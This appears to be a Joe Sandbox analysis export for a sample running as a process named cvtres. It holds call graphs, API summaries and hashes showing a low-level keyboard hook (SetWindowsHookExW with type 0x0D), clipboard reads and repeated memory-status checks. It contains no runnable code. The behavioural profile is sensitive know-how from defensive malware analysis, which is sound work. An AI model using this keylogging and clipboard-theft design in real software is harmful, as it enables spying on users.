GetModuleHandleW 48376->48383 48384 a9edbe1 GetModuleHandleW GetModuleHandleW 48376->48384 48377 ab3c243 48378 ab3c25b 48377->48378 48385 ab3c223 GetModuleHandleW GetModuleHandleW GetModuleHandleW GetModuleHandleW LoadLibraryExW 48377->48385 48386 ab3c230 GetModuleHandleW GetModuleHandleW GetModuleHandleW GetModuleHandleW LoadLibraryExW 48377->48386 48378->48338 48379 ab3c253 48379->48378 48380 ab3b478 LoadLibraryExW 48379->48380 48380->48378 48381->48377 48382->48377 48383->48377 48384->48377 48385->48379 48386->48379 48388 a9edaad 48387->48388 48389 a9edb2e 48388->48389 48390 a9edbf0 GetModuleHandleW GetModuleHandleW 48388->48390 48391 a9edbe1 GetModuleHandleW GetModuleHandleW 48388->48391 48390->48389 48391->48389 48393 a9edaad 48392->48393 48394 a9edb2e 48393->48394 48395 a9edbf0 GetModuleHandleW GetModuleHandleW 48393->48395 48396 a9edbe1 GetModuleHandleW GetModuleHandleW 48393->48396 48395->48394 48396->48394 48398 a9edf30 GetModuleHandleW 48397->48398 48400 a9ed663 48398->48400 48401 a9eeec0 48400->48401 48404 a9eee8f 48400->48404 48402 a9eeef5 48401->48402 48403 a9ed304 CreateWindowExW 48401->48403 48402->48360 48403->48402 48405 a9ed304 CreateWindowExW 48404->48405 48406 a9eeef5 48405->48406 48406->48360 48407 6f6add0 48408 6f6adee 48407->48408 48411 6f69dc0 48408->48411 48410 6f6ae25 48412 6f6c8f0 LoadLibraryA 48411->48412 48414 6f6c9cc 48412->48414 48415 6f64540 48416 6f64554 48415->48416 48419 6f6478a 48416->48419 48417 6f6455d 48424 6f64793 48419->48424 48425 6f64986 48419->48425 48429 6f6496c 48419->48429 48433 6f6485f 48419->48433 48437 6f64870 48419->48437 48424->48417 48426 6f64999 48425->48426 48427 6f649ab 48425->48427 48441 6f64c78 48426->48441 48430 6f6491f 48429->48430 48431 6f649ab 48430->48431 48432 6f64c78 RtlEncodePointer 48430->48432 48432->48431 48434 6f64870 48433->48434 48435 6f649ab 48434->48435 48436 6f64c78 RtlEncodePointer 48434->48436 48436->48435 48438 6f648b4 48437->48438 48439 6f649ab 48438->48439 48440 6f64c78 RtlEncodePointer 48438->48440 48440->48439 48442 6f64c86 48441->48442 48445 6f64cc8 48442->48445 48443 6f64c96 48443->48427 48446 6f64d02 48445->48446 48447 6f64d55 48446->48447 48448 6f64d2c RtlEncodePointer 48446->48448 48447->48443 48448->48447 48691 ab30b48 48692 ab30b58 48691->48692 48695 ab30ba0 48692->48695 48696 ab30be1 KiUserCallbackDispatcher 48695->48696 48697 ab30b5f 48696->48697 48449 a9eced0 48450 a9ecee3 48449->48450 48453 a9ea168 48450->48453 48452 a9eceee 48454 a9ea173 48453->48454 48456 a9ed568 4 API calls 48454->48456 48457 a9ed560 4 API calls 48454->48457 48455 a9ecf5a 48455->48452 48456->48455 48457->48455 48468 a9ea270 48470 a9ea285 48468->48470 48469 a9ea564 48470->48469 48472 a9eb528 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 48470->48472 48473 a9eb519 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 48470->48473 48476 a9ea718 48470->48476 48480 a9ea580 48470->48480 48486 a9eb70b 48470->48486 48472->48470 48473->48470 48493 a9ea7d0 48476->48493 48501 a9ea7e0 48476->48501 48477 a9ea73f 48477->48470 48481 a9ea5a1 48480->48481 48482 a9ea5c4 48480->48482 48481->48470 48483 a9ea5ee 48482->48483 48484 a9ea7d0 4 API calls 48482->48484 48485 a9ea7e0 4 API calls 48482->48485 48483->48470 48484->48483 48485->48483 48488 a9eb70c 48486->48488 48487 a9eb75c 48487->48470 48488->48487 48491 a9eba28 3 API calls 48488->48491 48492 a9eba17 3 API calls 48488->48492 48489 a9eb74e 48489->48487 48490 a9ebbe1 GlobalMemoryStatusEx 48489->48490 48490->48487 48491->48489 48492->48489 48494 a9ea7f4 48493->48494 48496 a9ea832 48493->48496 48497 a9ea7d0 4 API calls 48494->48497 48498 a9ea7e0 4 API calls 48494->48498 48495 a9ea80a 48509 a9eb528 48495->48509 48521 a9eb519 48495->48521 48496->48477 48497->48495 48498->48495 48502 a9ea7f4 48501->48502 48504 a9ea832 48501->48504 48507 a9ea7d0 4 API calls 48502->48507 48508 a9ea7e0 4 API calls 48502->48508 48503 a9ea80a 48505 a9eb528 4 API calls 48503->48505 48506 a9eb519 4 API calls 48503->48506 48504->48477 48505->48504 48506->48504 48507->48503 48508->48503 48510 a9eb533 48509->48510 48512 a9eb55b 48509->48512 48510->48496 48511 a9eb5b1 48511->48496 48512->48511 48513 a9eb64f 48512->48513 48516 a9eb65d 48512->48516 48514 a9ea718 4 API calls 48513->48514 48517 a9eb656 48514->48517 48515 a9eb74e 48515->48517 48541 a9ebbe1 48515->48541 48516->48517 48533 a9eba28 48516->48533 48537 a9eba17 48516->48537 48517->48496 48522 a9eb533 48521->48522 48524 a9eb55b 48521->48524 48522->48496 48523 a9eb5b1 48523->48496 48524->48523 48525 a9eb64f 48524->48525 48528 a9eb65d 48524->48528 48526 a9ea718 4 API calls 48525->48526 48529 a9eb656 48526->48529 48527 a9eb74e 48527->48529 48530 a9ebbe1 GlobalMemoryStatusEx 48527->48530 48528->48529 48531 a9eba28 3 API calls 48528->48531 48532 a9eba17 3 API calls 48528->48532 48529->48496 48530->48529 48531->48527 48532->48527 48534 a9eba36 48533->48534 48545 a9eba60 48533->48545 48553 a9eba51 48533->48553 48534->48515 48539 a9eba60 2 API calls 48537->48539 48540 a9eba51 2 API calls 48537->48540 48538 a9eba36 48538->48515 48539->48538 48540->48538 48542 a9ebb8b GlobalMemoryStatusEx 48541->48542 48544 a9ebbef 48541->48544 48543 a9ebbae 48542->48543 48543->48517 48544->48517 48546 a9eba6d 48545->48546 48547 a9eba95 48545->48547 48546->48534 48561 a9ea124 48547->48561 48549 a9ebab6 48549->48534 48551 a9ebb7e GlobalMemoryStatusEx 48552 a9ebbae 48551->48552 48552->48534 48554 a9eba6d 48553->48554 48555 a9eba95 48553->48555 48554->48534 48556 a9ea124 GlobalMemoryStatusEx 48555->48556 48558 a9ebab2 48556->48558 48557 a9ebab6 48557->48534 48558->48557 48559 a9ebb7e GlobalMemoryStatusEx 48558->48559 48560 a9ebbae 48559->48560 48560->48534 48562 a9ebb38 GlobalMemoryStatusEx 48561->48562 48564 a9ebab2 48562->48564 48564->48549 48564->48551 48565 533e3dc 48566 533e3f4 48565->48566 48567 533e44e 48566->48567 48575 ab304d3 48566->48575 48581 a9ef1f0 48566->48581 48584 a9ef0c8 48566->48584 48588 a9ef0b8 48566->48588 48592 ab304e0 48566->48592 48598 ab304d1 48566->48598 48604 a9ed31c 48566->48604 48576 ab3050d 48575->48576 48577 ab3053f 48576->48577 48608 ab3c9c3 48576->48608 48613 ab3c9c8 48576->48613 48618 ab30668 48576->48618 48582 a9ef207 48581->48582 48687 a9ed354 48581->48687 48582->48567 48585 a9ef0ee 48584->48585 48586 a9ed31c GetModuleHandleW 48585->48586 48587 a9ef0fa 48586->48587 48587->48567 48589 a9ef0ee 48588->48589 48590 a9ed31c GetModuleHandleW 48589->48590 48591 a9ef0fa 48590->48591 48591->48567 48593 ab3050d 48592->48593 48594 ab3053f 48593->48594 48595 ab3c9c3 CallWindowProcW 48593->48595 48596 ab30668 2 API calls 48593->48596 48597 ab3c9c8 CallWindowProcW 48593->48597 48595->48594 48596->48594 48597->48594 48599 ab3051c 48598->48599 48600 ab3053f 48599->48600 48601 ab3c9c3 CallWindowProcW 48599->48601 48602 ab30668 2 API calls 48599->48602 48603 ab3c9c8 CallWindowProcW 48599->48603 48601->48600 48602->48600 48603->48600 48605 a9ed327 48604->48605 48606 a9ed354 GetModuleHandleW 48605->48606 48607 a9ef207 48606->48607 48607->48567 48610 ab3c9dc 48608->48610 48609 ab3ca68 48609->48577 48624 ab3ca73 48610->48624 48627 ab3ca80 48610->48627 48615 ab3c9dc 48613->48615 48614 ab3ca68 48614->48577 48616 ab3ca73 CallWindowProcW 48615->48616 48617 ab3ca80 CallWindowProcW 48615->48617 48616->48614 48617->48614 48619 ab30676 48618->48619 48620 ab30763 48619->48620 48623 ab30798 CallWindowProcW 48619->48623 48637 ab30c38 48619->48637 48642 ab30c48 48619->48642 48620->48577 48623->48619 48625 ab3ca91 48624->48625 48630 ab3df2f 48624->48630 48625->48609 48628 ab3ca91 48627->48628 48629 ab3df2f CallWindowProcW 48627->48629 48628->48609 48629->48628 48633 ab30798 48630->48633 48634 ab307da 48633->48634 48636 ab307e1 48633->48636 48635 ab30832 CallWindowProcW 48634->48635 48634->48636 48635->48636 48636->48625 48638 ab30c54 48637->48638 48639 ab30e6e 48638->48639 48647 ab312b0 48638->48647 48653 ab312c0 48638->48653 48639->48619 48643 ab30c54 48642->48643 48644 ab30e6e 48643->48644 48645 ab312b0 OleGetClipboard 48643->48645 48646 ab312c0 OleGetClipboard 48643->48646 48644->48619 48645->48643 48646->48643 48649 ab312c8 48647->48649 48648 ab312dc 48648->48638 48649->48648 48659 ab312f9 48649->48659 48669 ab31308 48649->48669 48650 ab312f1 48650->48638 48655 ab312c8 48653->48655 48654 ab312dc 48654->48638 48655->48654 48657 ab312f9 OleGetClipboard 48655->48657 48658 ab31308 OleGetClipboard 48655->48658 48656 ab312f1 48656->48638 48657->48656 48658->48656 48660 ab3131a 48659->48660 48661 ab31335 48660->48661 48663 ab31379 48660->48663 48666 ab312f9 OleGetClipboard 48661->48666 48667 ab31308 OleGetClipboard 48661->48667 48662 ab3133b 48662->48650 48665 ab313f9 48663->48665 48679 ab315d0 48663->48679 48665->48650 48666->48662 48667->48662 48670 ab3131a 48669->48670 48671 ab31335 48670->48671 48673 ab31379 48670->48673 48676 ab312f9 OleGetClipboard 48671->48676 48677 ab31308 OleGetClipboard 48671->48677 48672 ab3133b 48672->48650 48675 ab313f9 48673->48675 48678 ab315d0 OleGetClipboard 48673->48678 48674 ab31417 48674->48650 48675->48650 48676->48672 48677->48672 48678->48674 48681 ab315e5 48679->48681 48682 ab31417 48681->48682 48683 ab310b8 48681->48683 48682->48650 48684 ab31678 OleGetClipboard 48683->48684 48686 ab31712 48684->48686 48688 a9ed35f 48687->48688 48689 a9ed22c GetModuleHandleW 48688->48689 48690 a9ef29b 48688->48690 48689->48690

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2958 a805860-a80587f 3004 a805881 call a805b28 2958->3004 3005 a805881 call a805b38 2958->3005 2960 a805887-a8058cc LdrInitializeThunk 2966 a8058d2-a8058ec 2960->2966 2967 a805a15-a805a32 2960->2967 2966->2967 2970 a8058f2-a80590c 2966->2970 2978 a805a37-a805a40 2967->2978 2974 a805912 2970->2974 2975 a80590e-a805910 2970->2975 2976 a805915-a805970 2974->2976 2975->2976 2985 a805972-a805974 2976->2985 2986 a805976 2976->2986 2987 a805979-a805a13 2985->2987 2986->2987 2987->2978 3004->2960 3005->2960
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.542513710.000000000A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A800000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a800000_cvtres.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c78292266cfb33b2188a2a0ff360183bc74a4a351619c152581f9d0674cefd00
                        • Instruction ID: adfe6b56382c78744134a4a3b928aa7ac7f5fe7924b0ff463d652c1c88cb25c9
                        • Opcode Fuzzy Hash: c78292266cfb33b2188a2a0ff360183bc74a4a351619c152581f9d0674cefd00
                        • Instruction Fuzzy Hash: 9F51A271B102099FCB54EBB4D894AAEB7B6EF88304F04C929E512DB391DF31D8058BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 0AB336FB
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: HookWindows
                        • String ID:
                        • API String ID: 2559412058-0
                        • Opcode ID: 2fb894545352f3ff82de3da0d348e202ffeb73d60d44cb308239fcf0904da973
                        • Instruction ID: b0bcdb456b6f154ef6af95b7aa4c272fbe29a28f60ca896b0396fcb0a6ec5d11
                        • Opcode Fuzzy Hash: 2fb894545352f3ff82de3da0d348e202ffeb73d60d44cb308239fcf0904da973
                        • Instruction Fuzzy Hash: 872115B29042089FCB50DFAAD944BEFFBF5EB88314F14842AE415AB350C774A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2561 ab30798-ab307d4 2562 ab30884-ab308a4 2561->2562 2563 ab307da-ab307df 2561->2563 2569 ab308a7-ab308b4 2562->2569 2564 ab30832-ab3086a CallWindowProcW 2563->2564 2565 ab307e1-ab30818 2563->2565 2566 ab30873-ab30882 2564->2566 2567 ab3086c-ab30872 2564->2567 2572 ab30821-ab30830 2565->2572 2573 ab3081a-ab30820 2565->2573 2566->2569 2567->2566 2572->2569 2573->2572
                        APIs
                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0AB30859
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: CallProcWindow
                        • String ID: (s
                        • API String ID: 2714655100-98621416
                        • Opcode ID: cbbfd0ef2893b9e752c5be9404ed5af9927e7e5e6d5bd4719385dd4602014fb5
                        • Instruction ID: 949662ffb6298056a4b3bb5526fde811a20dfef265823c18dc145a547674e9a9
                        • Opcode Fuzzy Hash: cbbfd0ef2893b9e752c5be9404ed5af9927e7e5e6d5bd4719385dd4602014fb5
                        • Instruction Fuzzy Hash: 7A414AB5900305CFCB54DF99C488AAABBF5FF88314F15C499E519AB721D374A841CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 2873 a9edbf0-a9edc16 2876 a9edc18-a9edc2f call a9ed22c call a9ed28c 2873->2876 2877 a9edc46-a9edc4e 2873->2877 2886 a9edc34-a9edc40 2876->2886 2878 a9edc94-a9edcdd call a9ed2a4 2877->2878 2879 a9edc50-a9edc55 call a9ed298 2877->2879 2901 a9ede88-a9edeba 2878->2901 2902 a9edce3-a9edd2e 2878->2902 2884 a9edc5a-a9edc8f 2879->2884 2894 a9edd31-a9edd33 2884->2894 2886->2877 2887 a9ede5b-a9ede81 2886->2887 2887->2901 2897 a9edd3c-a9edd93 call a9ed22c call a9ed2b0 2894->2897 2923 a9ede4f-a9ede5a 2897->2923 2924 a9edd99-a9edda6 2897->2924 2916 a9edec1-a9edf70 2901->2916 2902->2894 2930 a9edf78-a9edfa3 GetModuleHandleW 2916->2930 2931 a9edf72-a9edf75 2916->2931 2927 a9eddac-a9eddd9 call a9ed22c call a9ed2a4 2924->2927 2928 a9ede4b-a9ede4d 2924->2928 2927->2928 2941 a9edddb-a9edde8 2927->2941 2928->2916 2928->2923 2932 a9edfac-a9edfc0 2930->2932 2933 a9edfa5-a9edfab 2930->2933 2931->2930 2933->2932 2941->2928 2942 a9eddea-a9ede01 call a9ed22c call a9ed2bc 2941->2942 2947 a9ede0e-a9ede3d call a9ed2b0 2942->2947 2948 a9ede03-a9ede0c call a9ed2b0 2942->2948 2947->2928 2956 a9ede3f-a9ede49 2947->2956 2948->2928 2956->2928 2956->2947
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: bea40fb2ac4084299aa7d5ad7adc64ece3795c218c1a1d9d15efa6a443bfad15
                        • Instruction ID: 1683dd2797ede5d331de8c731b2e3c39645652b711c46277320eba40db87bfdf
                        • Opcode Fuzzy Hash: bea40fb2ac4084299aa7d5ad7adc64ece3795c218c1a1d9d15efa6a443bfad15
                        • Instruction Fuzzy Hash: 8BB18A70B047059FCB55DF78C8946AEBBF6EF89204B00892DD50ADB752DB34E905CBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3006 a805850-a805875 3008 a80587f 3006->3008 3053 a805881 call a805b28 3008->3053 3054 a805881 call a805b38 3008->3054 3009 a805887-a805889 3010 a805891-a805899 3009->3010 3012 a8058a1-a8058a7 3010->3012 3013 a8058ae 3012->3013 3014 a8058b5-a8058cc LdrInitializeThunk 3013->3014 3015 a8058d2-a8058ec 3014->3015 3016 a805a15-a805a32 3014->3016 3015->3016 3019 a8058f2-a80590c 3015->3019 3027 a805a37-a805a40 3016->3027 3023 a805912 3019->3023 3024 a80590e-a805910 3019->3024 3025 a805915-a805970 3023->3025 3024->3025 3034 a805972-a805974 3025->3034 3035 a805976 3025->3035 3036 a805979-a805a13 3034->3036 3035->3036 3036->3027 3053->3009 3054->3009
                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.542513710.000000000A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A800000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a800000_cvtres.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 15165f1d9d1457c42dbd64f55ecb8276b41c6e8e6522308983ccd19aa3ffa26f
                        • Instruction ID: 2fbb5a97a7d4daf254ca2b719caeabc98fb2f775b08715a953fe2c1f03f143aa
                        • Opcode Fuzzy Hash: 15165f1d9d1457c42dbd64f55ecb8276b41c6e8e6522308983ccd19aa3ffa26f
                        • Instruction Fuzzy Hash: 4D519371B102099FCB54EBB4D884AAEB7F6EF84704F108929E512DB791DF31D9058BA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 3055 a9ed2c8-a9ed2e9 3057 a9ed2eb-a9ed2ff 3055->3057 3058 a9ed303-a9eef76 3055->3058 3057->3058 3060 a9eef78-a9eef7e 3058->3060 3061 a9eef81-a9eef88 3058->3061 3060->3061 3062 a9eef8a-a9eef90 3061->3062 3063 a9eef93-a9eefcb 3061->3063 3062->3063 3064 a9eefd3-a9ef032 CreateWindowExW 3063->3064 3065 a9ef03b-a9ef073 3064->3065 3066 a9ef034-a9ef03a 3064->3066 3070 a9ef075-a9ef078 3065->3070 3071 a9ef080 3065->3071 3066->3065 3070->3071 3072 a9ef081 3071->3072 3072->3072
                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A9EF022
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: ae597e7e9a9e6d7df5cd4cb12f14d6e7107d66b9dbb1f783f21bd8f78f8ddb38
                        • Instruction ID: ec0b134c510c42d56735ec2b583f57973bd18f8593940eefec5c096d846f2e32
                        • Opcode Fuzzy Hash: ae597e7e9a9e6d7df5cd4cb12f14d6e7107d66b9dbb1f783f21bd8f78f8ddb38
                        • Instruction Fuzzy Hash: 1A5120B1D04348AFCB11CFA9C884ADEBFB5FF89304F14852AE415AB212D774A845CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.539230230.000000000533D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0533D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_533d000_cvtres.jbxd
                        Similarity
                        • API ID:
                        • String ID: sT
                        • API String ID: 0-2777335765
                        • Opcode ID: afd541d6ce13a57c0d736c834b716e24ff29f2382751e98ebba801d6e9810065
                        • Instruction ID: faa4071dcf52d7597d8b676c04e39a1b9787952ca325d7efd22d742eb2824f71
                        • Opcode Fuzzy Hash: afd541d6ce13a57c0d736c834b716e24ff29f2382751e98ebba801d6e9810065
                        • Instruction Fuzzy Hash: F6919B3551F3C06FD703AB308C66A927FB6AB43221B0981D7E084CF0A3E6695959D7B2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ac005626a3c89c4a0acf844f11f018b22c92e5ac2e402b3e98887537be069785
                        • Instruction ID: 6106c4efd4e43e5a03a00d66cbf9e4a1fea4b975288dd70f74db79d2cdac1850
                        • Opcode Fuzzy Hash: ac005626a3c89c4a0acf844f11f018b22c92e5ac2e402b3e98887537be069785
                        • Instruction Fuzzy Hash: FE415471E087898FCB01DFB9C8542EEFBF6AFCA210F05856AC444A7251DB389845CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A9EF022
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: aeb0b585c6ecca54a7fc600484cc166aa7b2cd6aec298b05e0ec1bef41f8c245
                        • Instruction ID: b9934b3ac284dfe29aed0f075c2680d79fd471eb27b1ad13c6897bbdd25e9480
                        • Opcode Fuzzy Hash: aeb0b585c6ecca54a7fc600484cc166aa7b2cd6aec298b05e0ec1bef41f8c245
                        • Instruction Fuzzy Hash: F451D0B1D00348AFDF15CFA9C884ADEBFB5BF88314F24852AE415AB211D7719845CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A9EF022
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: CreateWindow
                        • String ID:
                        • API String ID: 716092398-0
                        • Opcode ID: 5ba6738bc62bba470a344e01a1683aa5d6c09ae4d7f3fc0db5f62702737d92f4
                        • Instruction ID: caa33d87d7dea9ab80aaf32cd4fceb21d882219ae92d1acf7762c6a18e63bf6b
                        • Opcode Fuzzy Hash: 5ba6738bc62bba470a344e01a1683aa5d6c09ae4d7f3fc0db5f62702737d92f4
                        • Instruction Fuzzy Hash: 5951C0B1D00309AFDB15CFA9C884ADEBBB5BF88314F24852AE819AB211D7749845CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: 2e7be632f529289851f4d6b219a204525945d7da381493280eff628efe56ec6d
                        • Instruction ID: 790ce52843fbf2be7d21bff8d69d2d35eb6eefa186bf766c829b510114d08018
                        • Opcode Fuzzy Hash: 2e7be632f529289851f4d6b219a204525945d7da381493280eff628efe56ec6d
                        • Instruction Fuzzy Hash: E03158B1A10208DFDF14CFA9D884BEEBBF5EF88318F144569D504AB291DB749845CF51
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?), ref: 06F6C9BA
                        Memory Dump Source
                        • Source File: 00000001.00000002.539439119.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_6f60000_cvtres.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 781559d3d8005dc840c8c6958b75d9144b11515d4a643c0db589fdc65189bc21
                        • Instruction ID: b39eb34309aa2847e03771f82dd6cc0ba94c7c018386709154bcedb197311819
                        • Opcode Fuzzy Hash: 781559d3d8005dc840c8c6958b75d9144b11515d4a643c0db589fdc65189bc21
                        • Instruction Fuzzy Hash: AD3144B1D002489FDB64CFAAC88579EBFB1FF09718F10852AE896A7384D7749485CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?), ref: 06F6C9BA
                        Memory Dump Source
                        • Source File: 00000001.00000002.539439119.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_6f60000_cvtres.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 05599ca15b33d718bba06e7f751491e22a6ca62a85c5a405cee7fde7090f2af5
                        • Instruction ID: c4194cfe184610fe00117cb5352ceda41af2dcf9f9f9625ac2d4e342b728307c
                        • Opcode Fuzzy Hash: 05599ca15b33d718bba06e7f751491e22a6ca62a85c5a405cee7fde7090f2af5
                        • Instruction Fuzzy Hash: 493153B1D002499FDB64DFAAC88579EBFF1FB08318F10852AE896A7380D7749445CF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.542636079.000000000AB30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AB30000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_ab30000_cvtres.jbxd
                        Similarity
                        • API ID: Clipboard
                        • String ID:
                        • API String ID: 220874293-0
                        • Opcode ID: b672c3f8aad7445443564ad5724b47ca69127cafc43da73aacc7bd3710e071c4
                        • Instruction ID: f07a40735652c9986859b1b45dd2aa417de9093d3fb99db26d5a9ef3285f4cce
                        • Opcode Fuzzy Hash: b672c3f8aad7445443564ad5724b47ca69127cafc43da73aacc7bd3710e071c4
                        • Instruction Fuzzy Hash: 603105B1900208DFDB10CF99D984BEEBBF9EB48318F148169E504BB391D7B4A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0A9EDF96
                        Memory Dump Source
                        • Source File: 00000001.00000002.542578988.000000000A9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9E0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a9e0000_cvtres.jbxd
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 33e989e54ed51e983ae568b55727f31c0f647662339bc116d54c20adf4446866
                        • Instruction ID: be03796e92f21f8d3618dbf2bb3291fe4b53450c3b1fa734243c64fa7c502bcf
                        • Opcode Fuzzy Hash: 33e989e54ed51e983ae568b55727f31c0f647662339bc116d54c20adf4446866
                        • Instruction Fuzzy Hash: AB21AEB19093948FCB12CFA9C4447CEBFB0AF46214F19849ED455AB652C3396446CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0A80FACE,?,?,?,?,?), ref: 0A80FB8F
                        Memory Dump Source
                        • Source File: 00000001.00000002.542513710.000000000A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A800000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a800000_cvtres.jbxd
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 1d412e1211d9b8b6d6c0520a1fb1b79169cdb2c96d9e3830dfdbe2001fcd4118
                        • Instruction ID: a82497a37a42158000d8ae3e0d35bf234d6e6a2b3f873ca193e7df71dd28afb2
                        • Opcode Fuzzy Hash: 1d412e1211d9b8b6d6c0520a1fb1b79169cdb2c96d9e3830dfdbe2001fcd4118
                        • Instruction Fuzzy Hash: 7A21E0B5D01249AFDB10CFA9D884AEEBFF8EB48324F14841AE955A7350D378A945CF60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0A80FACE,?,?,?,?,?), ref: 0A80FB8F
                        Memory Dump Source
                        • Source File: 00000001.00000002.542513710.000000000A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A800000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_a800000_cvtres.jbxd
